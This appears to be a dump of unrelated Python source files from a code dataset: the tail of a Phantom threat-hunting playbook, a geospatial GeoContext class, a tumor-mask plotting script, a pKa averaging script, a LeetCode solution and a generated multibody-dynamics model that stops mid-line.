return\n\ndef join_format_ticket_description(action=None, success=None, container=None, results=None, handle=None, filtered_artifacts=None, filtered_results=None, custom_function=None):\n phantom.debug('join_format_ticket_description() called')\n\n # check if all connected incoming playbooks, actions, or custom functions are done i.e. have succeeded or failed\n if phantom.completed(action_names=['list_connections_1', 'get_system_info_1']):\n \n # call connected block \"format_ticket_description\"\n format_ticket_description(container=container, handle=handle)\n \n return\n\ndef on_finish(container, summary):\n phantom.debug('on_finish() called')\n # This function is called after all actions are completed.\n # summary of all the action and/or all details of actions\n # can be collected here.\n\n # summary_json = phantom.get_summary()\n # if 'result' in summary_json:\n # for action_result in summary_json['result']:\n # if 'action_run_id' in action_result:\n # action_results = phantom.get_action_results(action_run_id=action_result['action_run_id'], result_data=False, flatten=False)\n # phantom.debug(action_results)\n\n return","sub_path":"wannacry_hunting.py","file_name":"wannacry_hunting.py","file_ext":"py","file_size_in_byte":15442,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"339076635","text":"from descarteslabs import scenes\n\nfrom ...cereal import serializable\nfrom ..core import typecheck_promote\nfrom ..primitives import Str, Int, Float, Bool\nfrom ..containers import Tuple, Struct\n\nfrom .geometry import Geometry\n\nGeoContextBase = Struct[\n {\n \"geometry\": Geometry,\n \"resolution\": Float,\n \"crs\": Str,\n \"align_pixels\": Bool,\n \"bounds\": Tuple[Float, Float, Float, Float],\n \"bounds_crs\": Str,\n \"arr_shape\": Tuple[Int, Int],\n \"gdal_geotrans\": Tuple[\n Float, Float, Float, Float, Float, Float\n ], # 'a', 'b', 'c', 'd', 'e', 'f'\n \"projected_bounds\": Tuple[Float, Float, Float, Float],\n }\n]\n\n\n@serializable(is_named_concrete_type=True)\nclass GeoContext(GeoContextBase):\n _constructor = \"GeoContext.create\"\n _optional = {\n \"geometry\",\n \"resolution\",\n \"crs\",\n \"align_pixels\",\n \"bounds\",\n \"bounds_crs\",\n }\n _read_only = {\"arr_shape\", \"gdal_geotrans\", \"projected_bounds\"}\n\n _doc = {\n \"geometry\": \"\"\"\\\n Clip data to this `Geometry` (like a cutline).\n\n Coordinates must be WGS84 (lat-lon).\n If ``None``, data will just be clipped to `bounds`.\n \"\"\",\n \"resolution\": \"\"\"\\\n Distance, in units of the `crs`, that the edge of each pixel represents on the ground.\n \"\"\",\n \"crs\": \"\"\"\\\n Coordinate reference system into which data will be projected,\n expressed as an EPSG code (like ``EPSG:4326``) or a PROJ.4 definition.\n \"\"\",\n \"align_pixels\": \"\"\"\\\n Snap the `bounds` to whole-number intervals of ``resolution``, ensuring non-fractional pixels.\n\n Imagine the bounds overlayed on on a grid of ``resolution`` (say, 30m) intervals.\n ``align_pixels`` expands the bounds outward to the next grid lines.\n \"\"\",\n \"bounds\": \"\"\"\\\n Clip data to these ``(min_x, min_y, max_x, max_y)`` bounds,\n expressed in the coordinate reference system in `bounds_crs`.\n\n If `bounds_crs` and `crs` differ, the actual bounds will be the envelope\n of the rectangle defined by `bounds`, when reprojected into `crs`.\n \"\"\",\n \"bounds_crs\": \"\"\"\\\n The coordinate reference system of the `bounds`,\n expressed as an EPSG code (like ``EPSG:4326``) or a PROJ.4 definition.\n \"\"\",\n \"arr_shape\": \"\"\"\\\n ``(height, width)`` (i.e. ``(rows, cols)``) of the array this `GeoContext` will produce.\n\n This derived property (computed from `projected_bounds`, `resolution`, and `align_pixels`)\n cannot be set in ``__init__``, but you can call `compute` on it\n (useful for uploading to `.Catalog`).\n \"\"\",\n \"gdal_geotrans\": \"\"\"\\\n The 6-element GDAL geotrans this `GeoContext` will use.\n\n This tuple is in the form ``(a, b, c, d, e, f)``, where:\n\n * ``a``: top left pixel's x-coordinate\n * ``b``: west-east pixel resolution\n * ``c``: row rotation; always 0 for `GeoContext`\n * ``d``: top left pixel's y-coordinate\n * ``e``: column rotation; always 0 for `GeoContext`\n * ``f``: north-south pixel resolution, always a negative value\n\n This derived property (computed from `projected_bounds`, `resolution`, and `align_pixels`)\n cannot be set in ``__init__``, but you can call `compute` on it\n (useful for uploading to `.Catalog`).\n \"\"\",\n \"projected_bounds\": \"\"\"\\\n The actual bounds (in units of `crs`), if the `bounds_crs` convenience is used.\n\n This is the *envelope* of the four corners defined by `bounds`,\n when those corners are reprojected from `bounds_crs` into `crs`.\n\n This derived property cannot be set in ``__init__``, but you can call `compute` on it\n (useful for uploading to `.Catalog`).\n \"\"\",\n }\n\n @classmethod\n @typecheck_promote(Str)\n def from_dltile_key(cls, key):\n return cls._from_apply(\"GeoContext.from_dltile_key\", key)\n\n @classmethod\n @typecheck_promote(Int, Int, Int)\n def from_xyz_tile(cls, x, y, z):\n return cls._from_apply(\"GeoContext.from_xyz_tile\", x, y, z)\n\n @classmethod\n def from_scenes(cls, ctx):\n \"\"\"\n Construct a Workflows GeoContext from a Scenes GeoContext\n\n Parameters\n ----------\n ctx: ~descarteslabs.scenes.AOI, ~descarteslabs.scenes.DLTile, or ~descarteslabs.scenes.XYZTile\n\n Returns\n -------\n ~descarteslabs.workflows.GeoContext\n \"\"\"\n if isinstance(ctx, scenes.AOI):\n if ctx.shape is not None:\n raise ValueError(\"AOI shape is not supported.\")\n return cls(\n geometry=ctx.geometry,\n resolution=float(ctx.resolution),\n # ^ often given as an int, but we're stricter here\n crs=ctx.crs,\n align_pixels=ctx.align_pixels,\n bounds=ctx.bounds,\n bounds_crs=ctx.bounds_crs,\n )\n elif isinstance(ctx, scenes.DLTile):\n return cls.from_dltile_key(ctx.key)\n elif isinstance(ctx, scenes.XYZTile):\n return cls.from_xyz_tile(ctx.x, ctx.y, ctx.z)\n else:\n raise TypeError(\n \"In GeoContext.from_scenes, expected a `descarteslabs.scenes.GeoContext` \"\n \"but got {}\".format(ctx)\n )\n\n @classmethod\n def _promote(cls, obj):\n if isinstance(obj, scenes.GeoContext):\n return cls.from_scenes(obj)\n else:\n return super(GeoContext, cls)._promote(obj)\n","sub_path":"descarteslabs/workflows/types/geospatial/geocontext.py","file_name":"geocontext.py","file_ext":"py","file_size_in_byte":5783,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"251791339","text":"import os\n\nfrom skimage import io, data, color\nimport matplotlib.pyplot as plt\nimport numpy as np\nfrom cv2 import imread\n#\n# # configuration\n# config = dict()\n# config['image_dir_index'] = 2\n# config['dir_index'] = 0 # 0 or 1, original or processed\n# config['modality_index'] = 1 # 0-4\n# config['slice_number'] = 101\n#\n# image_dir_list = ['Sagittal_1', 'Coronal_2', 'Transverse_3']\n# modalities = ['t1', 't1ce', 'flair', 't2']\n\nimage_dir = 'PNG'\n\nimage = color.rgb2gray(io.imread(image_dir + '/processed/t1ce/101.png'))\n# image = imread(os.path.join(image_dir + '/processed/t1ce/101.png'))\n# image = imread(os.path.join(image_dir + '/processed/t2/101.png'))\nmask = imread(os.path.join(image_dir + '/processed/truth/101.png'))\n\n\ndef get_whole_tumor_mask(data):\n return data > 0\n\n\ndef get_tumor_core_mask(data):\n return np.logical_or(data == 1, data == 4)\n\n\ndef get_enhancing_tumor_mask(data):\n return data == 4\n\n\ndef draw_mask_skimage():\n # image_dir = image_dir_list[image_dir_index] # 0-2\n # modality = modalities[modality_index] # 0-4\n #\n # mask_overlap_path = os.path.join(image_dir + '/mask_overlap')\n # if not os.path.exists(mask_overlap_path):\n # os.mkdir(mask_overlap_path)\n #\n # mask_original_path = os.path.join(mask_overlap_path + '/original')\n # if not os.path.exists(mask_original_path):\n # os.mkdir(mask_original_path)\n #\n # mask_processed_path = os.path.join(mask_overlap_path + '/processed')\n # if not os.path.exists(mask_processed_path):\n # os.mkdir(mask_processed_path)\n #\n # if dir_index == 0:\n # # modalities += 'seg'\n # # image_path = imread(os.path.join(image_dir + '/original/BraTS19_2013_2_1_'\n # # + modality + '/' + str(slice_number) + '.png'))\n # # mask_path = imread(os.path.join(image_dir + '/original/BraTS19_2013_2_1_seg/'\n # # + str(slice_number) + '.png'))\n # image_path = imread(os.path.join(image_dir + '/original/BraTS19_2013_2_1_' + modality))\n # mask_path = imread(os.path.join(image_dir + '/original/BraTS19_2013_2_1_seg'))\n # out_path = os.path.join(mask_original_path + '/BraTS19_2013_2_1_' + modality)\n # else:\n # # modalities += 'truth'\n # image_path = imread(os.path.join(image_dir + '/processed/' + modality + '/' + str(slice_number) + '.png'))\n # mask_path = imread(os.path.join(image_dir + '/processed/truth/' + str(slice_number) + '.png'))\n # out_path = os.path.join(mask_processed_path, modality)\n #\n # if not os.path.exists(out_path):\n # os.mkdir(out_path)\n\n print(type(mask), '\\n', np.max(mask), mask.dtype)\n # mask_float = 255.0 * (mask_path/255.0) ** 2\n mask_float = mask.astype(np.float64)\n print(type(mask_float), '\\n', np.max(mask_float), mask_float.dtype)\n print('\\nWT: ', np.sum(get_whole_tumor_mask(mask_float)),\n '\\nTC: ', np.sum(get_tumor_core_mask(mask_float)),\n '\\nET: ', np.sum(get_enhancing_tumor_mask(mask_float)))\n\n\n # print(slice_number)\n\n # print(type(image), type(mask))\n # print(image)\n # mask = data.chelsea()\n img_float = image.astype(np.float64)\n print(np.max(img_float), np.min(img_float))\n\n # mask_grey = color.rgb2gray(mask)\n mask_grey = 255.0 * mask / np.max(mask)\n print('mask:', np.max(mask_grey), np.min(mask_grey))\n mask_grey = color.rgb2gray(mask_grey)\n mask_grey = mask_float\n print('mask:', np.max(mask_grey), np.min(mask_grey))\n print('image:', np.max(image), np.min(image))\n print('mask_dtype:', mask_grey.dtype, 'image_dtype:', image.dtype)\n print('type:', type(mask_grey), type(image))\n\n ET, EDEMA, NCR_and_NET = 0, 0, 0\n print(NCR_and_NET)\n\n '''\n \n 4 uint8\n \n 4.0 float64\n \n WT: 6432 \n TC: 3723 \n ET: 2877\n 255.0 0.0\n mask: 255.0 0.0\n mask: 4.0 0.0\n image: 255 0\n mask_dtype: float64 image_dtype: uint8\n type: \n '''\n\n rows, cols = mask_grey.shape\n labels = np.zeros([rows, cols])\n for i in range(rows):\n for j in range(cols):\n # if mask_grey[i, j] > 0.66:\n if mask_grey[i, j] == 1: # ET, labels_number:the second biggest, blue\n labels[i, j] = 2\n ET += 1\n elif mask_grey[i, j] == 0.5: # WT-ET-TC = edema, labels_number:biggest, yellow\n labels[i, j] = 3\n EDEMA += 1\n elif mask_grey[i, j] > 0: # TC-ET\n labels[i, j] = 1\n NCR_and_NET += 1\n # label_image = color.label2rgb(labels, bg_label=0)\n # label_image = color.label2rgb(labels, image=image)\n\n TC = NCR_and_NET + ET\n WT = TC + EDEMA\n print('ET: ', ET)\n print('EDEMA: ', EDEMA)\n print('NCR_and_NET: ', NCR_and_NET)\n print('TC: ', TC)\n print('WT: ', WT)\n\n label_image = color.label2rgb(labels, bg_label=0)\n # label_image = color.label2rgb(labels, image=image, bg_label=0)\n\n # figsize = mask_grey.shape[0]/ , mask_grey.shape[1]\n plt.figure(figsize=(15, 15))\n # plt.figure(figsize=(15, 15), facecolor='black')\n print(label_image.dtype)\n # plt.imshow(label_image, cmap='gray')\n plt.imshow(label_image)\n plt.axis('off')\n plt.tight_layout(pad=0)\n # plt.savefig(os.path.join(out_path + '/test_plot.png'))\n plt.savefig('test_plot.png')\n plt.show()\n\n # io.show()\n\n\nif __name__ == '__main__':\n draw_mask_skimage()\n","sub_path":"mask_2d.py","file_name":"mask_2d.py","file_ext":"py","file_size_in_byte":5538,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"111963421","text":"import numpy as np\nimport pandas as pd\nimport os\n\nreps = [ 1 , 2 , 3 , 4 , 5 ]\n#reps = [ 1 ]\n\n\npwd = os.getcwd()\n\npkas = {}\n\nfor rep in reps:\n\tallfiles = os.listdir(pwd+'/'+str(rep))\n\tpath = pwd + '/' + str(rep) + '/'\n\t\n\t\n\tfor filename in allfiles:\n\t\tif( filename.split('.')[-1] == 'xvg' ):\n\t\t\tfullpath = path + filename\n\t\t\t\n\t\t\tfilename = filename.replace('-','_').replace('.','_')\n\t\t\tfilename = filename.split('_')\n\t\t\t\n\t\t\tres_name = str(filename[1])\n\t\t\tres_numb = str(filename[2])\n\t\t\tchain = str(filename[3])\n\t\t\t\n\t\t\tresidue = res_name + '-' + res_numb + '_' + chain\n\t\t\t\n\t\t\tif( residue not in pkas ):\n\t\t\t\tpkas[residue] = []\n\t\t\t\n\t\t\txvg = pd.read_csv( fullpath , sep='\\t' , header=None)\n\t\t\txvg.columns = ['time','pka']\n\t\t\t\n\t\t\tavg = xvg['pka'].mean()\n\t\t\tstd = xvg['pka'].std(ddof=1)\n\t\t\t\n\t\t\tpkas[residue].append( avg )\n\t\t\t\n\nresidue_list = [x for x in pkas.keys()]\nresidue_list.sort()\n\n\nwith open('pka_avg.dat','w') as output_file:\n\tfor residue in residue_list:\n\t\tvec = np.array( pkas[residue] )\n\t\t\n\t\tavg = vec.mean()\n\t\terr = vec.std() / np.sqrt( len(vec) )\n\t\t\n\t\toutput_file.write('%s\\t%.6f\\t%.6f\\n' % (residue , avg, err))\n\t\n","sub_path":"pka_avg.py","file_name":"pka_avg.py","file_ext":"py","file_size_in_byte":1134,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"66824354","text":"class Solution(object):\n def longestCommonSubsequence(self, text1, text2):\n \"\"\"\n :type text1: str\n :type text2: str\n :rtype: int\n \"\"\"\n if text1==None or len(text1)==None or text2==None or len(text2)==0:\n return 0\n dp=[[0]*(len(text2)+1) for i in range(len(text1)+1)]\n for i in range(len(text1)):\n for j in range(len(text2)):\n if text1[i]==text2[j]:\n dp[i+1][j+1]=dp[i][j]+1\n else:\n dp[i+1][j+1]=max(dp[i+1][j],dp[i][j+1])\n return dp[-1][-1]","sub_path":"1143.最长公共子序列/1143-最长公共子序列.py","file_name":"1143-最长公共子序列.py","file_ext":"py","file_size_in_byte":596,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"405447769","text":"\nimport numpy as np\nfrom numpy import cos, sin\nfrom numpy.linalg import multi_dot\nfrom scipy.misc import derivative\n\ntry:\n from smbd.numenv.python.numerics.matrix_funcs import A, B, G, E, triad, skew_matrix as skew\nexcept ModuleNotFoundError:\n print('Failed importing compiled matrices!')\n print('Falling back to python defined matrix functions')\n from smbd.numenv.python.numerics.misc import A, B, G, E, triad, skew_matrix as skew\n\n\n\nclass topology(object):\n\n def __init__(self,prefix=''):\n self.t = 0.0\n self.prefix = (prefix if prefix=='' else prefix+'.')\n self.config = None\n\n self.indicies_map = {'ground': 0, 'rbs_crank': 1, 'rbs_conct': 2, 'rbs_rockr': 3}\n\n self.n = 28\n self.nc = 29\n self.nrows = 16\n self.ncols = 2*4\n self.rows = np.arange(self.nrows)\n\n reactions_indicies = ['F_ground_jcs_a', 'T_ground_jcs_a', 'F_ground_mcs_act', 'T_ground_mcs_act', 'F_rbs_crank_mcs_abs', 'T_rbs_crank_mcs_abs', 'F_rbs_crank_jcs_b', 'T_rbs_crank_jcs_b', 'F_rbs_conct_jcs_c', 'T_rbs_conct_jcs_c', 'F_rbs_rockr_jcs_d', 'T_rbs_rockr_jcs_d']\n self.reactions_indicies = ['%s%s'%(self.prefix,i) for i in reactions_indicies]\n\n \n\n def initialize(self):\n self.t = 0\n self.assemble(self.indicies_map, {}, 0)\n self.set_initial_states()\n self.eval_constants()\n\n def assemble(self, indicies_map, interface_map, rows_offset):\n self.rows_offset = rows_offset\n self._set_mapping(indicies_map, interface_map)\n self.rows += self.rows_offset\n self.jac_rows = np.array([0, 0, 0, 0, 1, 1, 1, 1, 2, 2, 2, 2, 3, 3, 3, 3, 4, 4, 4, 4, 5, 5, 5, 5, 6, 6, 6, 6, 7, 7, 7, 7, 8, 8, 8, 8, 9, 9, 9, 9, 10, 10, 10, 10, 11, 11, 12, 12, 13, 14, 15])\n self.jac_rows += self.rows_offset\n self.jac_cols = [self.ground*2, self.ground*2+1, self.rbs_crank*2, self.rbs_crank*2+1, self.ground*2, self.ground*2+1, self.rbs_crank*2, self.rbs_crank*2+1, self.ground*2, self.ground*2+1, self.rbs_crank*2, self.rbs_crank*2+1, self.ground*2, self.ground*2+1, self.rbs_crank*2, self.rbs_crank*2+1, self.ground*2, self.ground*2+1, self.rbs_crank*2, self.rbs_crank*2+1, self.rbs_crank*2, self.rbs_crank*2+1, self.rbs_conct*2, self.rbs_conct*2+1, self.rbs_conct*2, self.rbs_conct*2+1, self.rbs_rockr*2, self.rbs_rockr*2+1, self.rbs_conct*2, self.rbs_conct*2+1, self.rbs_rockr*2, self.rbs_rockr*2+1, self.ground*2, self.ground*2+1, self.rbs_rockr*2, self.rbs_rockr*2+1, self.ground*2, self.ground*2+1, self.rbs_rockr*2, self.rbs_rockr*2+1, self.ground*2, self.ground*2+1, self.rbs_rockr*2, self.rbs_rockr*2+1, self.ground*2, self.ground*2+1, self.ground*2, self.ground*2+1, self.rbs_crank*2+1, self.rbs_conct*2+1, self.rbs_rockr*2+1]\n\n def set_initial_states(self):\n self.set_gen_coordinates(self.config.q)\n self.set_gen_velocities(self.config.qd)\n self.q0 = self.config.q\n\n def _set_mapping(self,indicies_map, interface_map):\n p = self.prefix\n self.ground = indicies_map[p+'ground']\n self.rbs_crank = indicies_map[p+'rbs_crank']\n self.rbs_conct = indicies_map[p+'rbs_conct']\n self.rbs_rockr = indicies_map[p+'rbs_rockr']\n \n\n \n def eval_constants(self):\n config = self.config\n\n self.Pg_ground = np.array([[1], [0], [0], [0]], dtype=np.float64)\n self.m_ground = 1.0\n self.Jbar_ground = np.array([[1, 0, 0], [0, 1, 0], [0, 0, 1]], dtype=np.float64)\n self.F_rbs_crank_gravity = np.array([[0], [0], [-9810.0*config.m_rbs_crank]], dtype=np.float64)\n self.F_rbs_conct_gravity = np.array([[0], [0], [-9810.0*config.m_rbs_conct]], dtype=np.float64)\n self.F_rbs_rockr_gravity = np.array([[0], [0], [-9810.0*config.m_rbs_rockr]], dtype=np.float64)\n\n self.Mbar_ground_jcs_a = multi_dot([A(config.P_ground).T,triad(config.ax1_jcs_a)])\n self.Mbar_rbs_crank_jcs_a = multi_dot([A(config.P_rbs_crank).T,triad(config.ax1_jcs_a)])\n self.ubar_ground_jcs_a = (multi_dot([A(config.P_ground).T,config.pt1_jcs_a]) + -1*multi_dot([A(config.P_ground).T,config.R_ground]))\n self.ubar_rbs_crank_jcs_a = (multi_dot([A(config.P_rbs_crank).T,config.pt1_jcs_a]) + -1*multi_dot([A(config.P_rbs_crank).T,config.R_rbs_crank]))\n self.Mbar_ground_mcs_act = self.Mbar_ground_jcs_a\n self.Mbar_rbs_crank_mcs_act = self.Mbar_rbs_crank_jcs_a\n self.ubar_rbs_crank_mcs_abs = (multi_dot([A(config.P_rbs_crank).T,config.pt1_mcs_abs]) + -1*multi_dot([A(config.P_rbs_crank).T,config.R_rbs_crank]))\n self.ubar_ground_mcs_abs = (multi_dot([A(config.P_ground).T,config.pt1_mcs_abs]) + -1*multi_dot([A(config.P_ground).T,config.R_ground]))\n self.Mbar_rbs_crank_jcs_b = multi_dot([A(config.P_rbs_crank).T,triad(config.ax1_jcs_b)])\n self.Mbar_rbs_conct_jcs_b = multi_dot([A(config.P_rbs_conct).T,triad(config.ax1_jcs_b)])\n self.ubar_rbs_crank_jcs_b = (multi_dot([A(config.P_rbs_crank).T,config.pt1_jcs_b]) + -1*multi_dot([A(config.P_rbs_crank).T,config.R_rbs_crank]))\n self.ubar_rbs_conct_jcs_b = (multi_dot([A(config.P_rbs_conct).T,config.pt1_jcs_b]) + -1*multi_dot([A(config.P_rbs_conct).T,config.R_rbs_conct]))\n self.Mbar_rbs_conct_jcs_c = multi_dot([A(config.P_rbs_conct).T,triad(config.ax1_jcs_c)])\n self.Mbar_rbs_rockr_jcs_c = multi_dot([A(config.P_rbs_rockr).T,triad(config.ax2_jcs_c,triad(config.ax1_jcs_c)[0:3,1:2])])\n self.ubar_rbs_conct_jcs_c = (multi_dot([A(config.P_rbs_conct).T,config.pt1_jcs_c]) + -1*multi_dot([A(config.P_rbs_conct).T,config.R_rbs_conct]))\n self.ubar_rbs_rockr_jcs_c = (multi_dot([A(config.P_rbs_rockr).T,config.pt1_jcs_c]) + -1*multi_dot([A(config.P_rbs_rockr).T,config.R_rbs_rockr]))\n self.Mbar_rbs_rockr_jcs_d = multi_dot([A(config.P_rbs_rockr).T,triad(config.ax1_jcs_d)])\n self.Mbar_ground_jcs_d = multi_dot([A(config.P_ground).T,triad(config.ax1_jcs_d)])\n self.ubar_rbs_rockr_jcs_d = (multi_dot([A(config.P_rbs_rockr).T,config.pt1_jcs_d]) + -1*multi_dot([A(config.P_rbs_rockr).T,config.R_rbs_rockr]))\n self.ubar_ground_jcs_d = (multi_dot([A(config.P_ground).T,config.pt1_jcs_d]) + -1*multi_dot([A(config.P_ground).T,config.R_ground]))\n\n \n def set_gen_coordinates(self,q):\n self.R_ground = q[0:3,0:1]\n self.P_ground = q[3:7,0:1]\n self.R_rbs_crank = q[7:10,0:1]\n self.P_rbs_crank = q[10:14,0:1]\n self.R_rbs_conct = q[14:17,0:1]\n self.P_rbs_conct = q[17:21,0:1]\n self.R_rbs_rockr = q[21:24,0:1]\n self.P_rbs_rockr = q[24:28,0:1]\n\n \n def set_gen_velocities(self,qd):\n self.Rd_ground = qd[0:3,0:1]\n self.Pd_ground = qd[3:7,0:1]\n self.Rd_rbs_crank = qd[7:10,0:1]\n self.Pd_rbs_crank = qd[10:14,0:1]\n self.Rd_rbs_conct = qd[14:17,0:1]\n self.Pd_rbs_conct = qd[17:21,0:1]\n self.Rd_rbs_rockr = qd[21:24,0:1]\n self.Pd_rbs_rockr = qd[24:28,0:1]\n\n \n def set_gen_accelerations(self,qdd):\n self.Rdd_ground = qdd[0:3,0:1]\n self.Pdd_ground = qdd[3:7,0:1]\n self.Rdd_rbs_crank = qdd[7:10,0:1]\n self.Pdd_rbs_crank = qdd[10:14,0:1]\n self.Rdd_rbs_conct = qdd[14:17,0:1]\n self.Pdd_rbs_conct = qdd[17:21,0:1]\n self.Rdd_rbs_rockr = qdd[21:24,0:1]\n self.Pdd_rbs_rockr = qdd[24:28,0:1]\n\n \n def set_lagrange_multipliers(self,Lambda):\n self.L_jcs_a = Lambda[0:5,0:1]\n self.L_mcs_act = Lambda[5:6,0:1]\n self.L_mcs_abs = Lambda[6:7,0:1]\n self.L_jcs_b = Lambda[7:10,0:1]\n self.L_jcs_c = Lambda[10:14,0:1]\n self.L_jcs_d = Lambda[14:19,0:1]\n\n \n def eval_pos_eq(self):\n config = self.config\n t = self.t\n\n x0 = self.R_ground\n x1 = self.R_rbs_crank\n x2 = self.P_ground\n x3 = A(x2)\n x4 = self.P_rbs_crank\n x5 = A(x4)\n x6 = x3.T\n x7 = self.Mbar_rbs_crank_jcs_a[:,2:3]\n x8 = self.Mbar_rbs_crank_mcs_act[:,0:1]\n x9 = np.eye(1, dtype=np.float64)\n x10 = self.R_rbs_conct\n x11 = self.P_rbs_conct\n x12 = A(x11)\n x13 = self.R_rbs_rockr\n x14 = self.P_rbs_rockr\n x15 = A(x14)\n x16 = x15.T\n x17 = self.Mbar_ground_jcs_d[:,2:3]\n x18 = -1*x9\n\n self.pos_eq_blocks = [(x0 + -1*x1 + multi_dot([x3,self.ubar_ground_jcs_a]) + -1*multi_dot([x5,self.ubar_rbs_crank_jcs_a])),\n multi_dot([self.Mbar_ground_jcs_a[:,0:1].T,x6,x5,x7]),\n multi_dot([self.Mbar_ground_jcs_a[:,1:2].T,x6,x5,x7]),\n (cos(config.UF_mcs_act(t))*multi_dot([self.Mbar_ground_mcs_act[:,1:2].T,x6,x5,x8]) + -1*sin(config.UF_mcs_act(t))*multi_dot([self.Mbar_ground_mcs_act[:,0:1].T,x6,x5,x8])),\n (-1*config.UF_mcs_abs(t)*x9 + (x1 + -1*config.pt1_mcs_abs + multi_dot([x5,self.ubar_rbs_crank_mcs_abs]))[0:1,0:1]),\n (x1 + -1*x10 + multi_dot([x5,self.ubar_rbs_crank_jcs_b]) + -1*multi_dot([x12,self.ubar_rbs_conct_jcs_b])),\n (x10 + -1*x13 + multi_dot([x12,self.ubar_rbs_conct_jcs_c]) + -1*multi_dot([x15,self.ubar_rbs_rockr_jcs_c])),\n multi_dot([self.Mbar_rbs_conct_jcs_c[:,0:1].T,x12.T,x15,self.Mbar_rbs_rockr_jcs_c[:,0:1]]),\n (x13 + -1*x0 + multi_dot([x15,self.ubar_rbs_rockr_jcs_d]) + -1*multi_dot([x3,self.ubar_ground_jcs_d])),\n multi_dot([self.Mbar_rbs_rockr_jcs_d[:,0:1].T,x16,x3,x17]),\n multi_dot([self.Mbar_rbs_rockr_jcs_d[:,1:2].T,x16,x3,x17]),\n x0,\n (x2 + -1*self.Pg_ground),\n (x18 + multi_dot([x4.T,x4])),\n (x18 + multi_dot([x11.T,x11])),\n (x18 + multi_dot([x14.T,x14]))]\n\n \n def eval_vel_eq(self):\n config = self.config\n t = self.t\n\n v0 = np.zeros((3,1),dtype=np.float64)\n v1 = np.zeros((1,1),dtype=np.float64)\n v2 = np.eye(1, dtype=np.float64)\n\n self.vel_eq_blocks = [v0,\n v1,\n v1,\n -1*derivative(config.UF_mcs_act, t, 0.1, 1)*v2,\n -1*derivative(config.UF_mcs_abs, t, 0.1, 1)*v2,\n v0,\n v0,\n v1,\n v0,\n v1,\n v1,\n v0,\n np.zeros((4,1),dtype=np.float64),\n v1,\n v1,\n v1]\n\n \n def eval_acc_eq(self):\n config = self.config\n t = self.t\n\n a0 = self.Pd_ground\n a1 = self.Pd_rbs_crank\n a2 = self.Mbar_ground_jcs_a[:,0:1]\n a3 = self.P_ground\n a4 = A(a3).T\n a5 = self.Mbar_rbs_crank_jcs_a[:,2:3]\n a6 = B(a1,a5)\n a7 = a5.T\n a8 = self.P_rbs_crank\n a9 = A(a8).T\n a10 = a0.T\n a11 = B(a8,a5)\n a12 = self.Mbar_ground_jcs_a[:,1:2]\n a13 = np.eye(1, dtype=np.float64)\n a14 = self.Mbar_rbs_crank_mcs_act[:,0:1]\n a15 = self.Mbar_ground_mcs_act[:,1:2]\n a16 = self.Mbar_ground_mcs_act[:,0:1]\n a17 = self.Pd_rbs_conct\n a18 = self.Pd_rbs_rockr\n a19 = self.Mbar_rbs_rockr_jcs_c[:,0:1]\n a20 = self.P_rbs_rockr\n a21 = A(a20).T\n a22 = self.Mbar_rbs_conct_jcs_c[:,0:1]\n a23 = self.P_rbs_conct\n a24 = a17.T\n a25 = self.Mbar_rbs_rockr_jcs_d[:,0:1]\n a26 = self.Mbar_ground_jcs_d[:,2:3]\n a27 = B(a0,a26)\n a28 = a26.T\n a29 = a18.T\n a30 = B(a3,a26)\n a31 = self.Mbar_rbs_rockr_jcs_d[:,1:2]\n\n self.acc_eq_blocks = [(multi_dot([B(a0,self.ubar_ground_jcs_a),a0]) + -1*multi_dot([B(a1,self.ubar_rbs_crank_jcs_a),a1])),\n (multi_dot([a2.T,a4,a6,a1]) + multi_dot([a7,a9,B(a0,a2),a0]) + 2*multi_dot([a10,B(a3,a2).T,a11,a1])),\n (multi_dot([a12.T,a4,a6,a1]) + multi_dot([a7,a9,B(a0,a12),a0]) + 2*multi_dot([a10,B(a3,a12).T,a11,a1])),\n (-1*derivative(config.UF_mcs_act, t, 0.1, 2)*a13 + multi_dot([a14.T,a9,(cos(config.UF_mcs_act(t))*B(a0,a15) + -1*sin(config.UF_mcs_act(t))*B(a0,a16)),a0]) + multi_dot([(cos(config.UF_mcs_act(t))*multi_dot([a15.T,a4]) + -1*sin(config.UF_mcs_act(t))*multi_dot([a16.T,a4])),B(a1,a14),a1]) + 2*multi_dot([(cos(config.UF_mcs_act(t))*multi_dot([a10,B(a3,a15).T]) + -1*sin(config.UF_mcs_act(t))*multi_dot([a10,B(a3,a16).T])),B(a8,a14),a1])),\n (-1*derivative(config.UF_mcs_abs, t, 0.1, 2)*a13 + multi_dot([B(a1,self.ubar_rbs_crank_mcs_abs),a1])[0:1,0:1]),\n (multi_dot([B(a1,self.ubar_rbs_crank_jcs_b),a1]) + -1*multi_dot([B(a17,self.ubar_rbs_conct_jcs_b),a17])),\n (multi_dot([B(a17,self.ubar_rbs_conct_jcs_c),a17]) + -1*multi_dot([B(a18,self.ubar_rbs_rockr_jcs_c),a18])),\n (multi_dot([a19.T,a21,B(a17,a22),a17]) + multi_dot([a22.T,A(a23).T,B(a18,a19),a18]) + 2*multi_dot([a24,B(a23,a22).T,B(a20,a19),a18])),\n (multi_dot([B(a18,self.ubar_rbs_rockr_jcs_d),a18]) + -1*multi_dot([B(a0,self.ubar_ground_jcs_d),a0])),\n (multi_dot([a25.T,a21,a27,a0]) + multi_dot([a28,a4,B(a18,a25),a18]) + 2*multi_dot([a29,B(a20,a25).T,a30,a0])),\n (multi_dot([a31.T,a21,a27,a0]) + multi_dot([a28,a4,B(a18,a31),a18]) + 2*multi_dot([a29,B(a20,a31).T,a30,a0])),\n np.zeros((3,1),dtype=np.float64),\n np.zeros((4,1),dtype=np.float64),\n 2*multi_dot([a1.T,a1]),\n 2*multi_dot([a24,a17]),\n 2*multi_dot([a29,a18])]\n\n \n def eval_jac_eq(self):\n config = self.config\n t = self.t\n\n j0 = np.eye(3, dtype=np.float64)\n j1 = self.P_ground\n j2 = np.zeros((1,3),dtype=np.float64)\n j3 = self.Mbar_rbs_crank_jcs_a[:,2:3]\n j4 = j3.T\n j5 = self.P_rbs_crank\n j6 = A(j5).T\n j7 = self.Mbar_ground_jcs_a[:,0:1]\n j8 = self.Mbar_ground_jcs_a[:,1:2]\n j9 = -1*j0\n j10 = A(j1).T\n j11 = B(j5,j3)\n j12 = 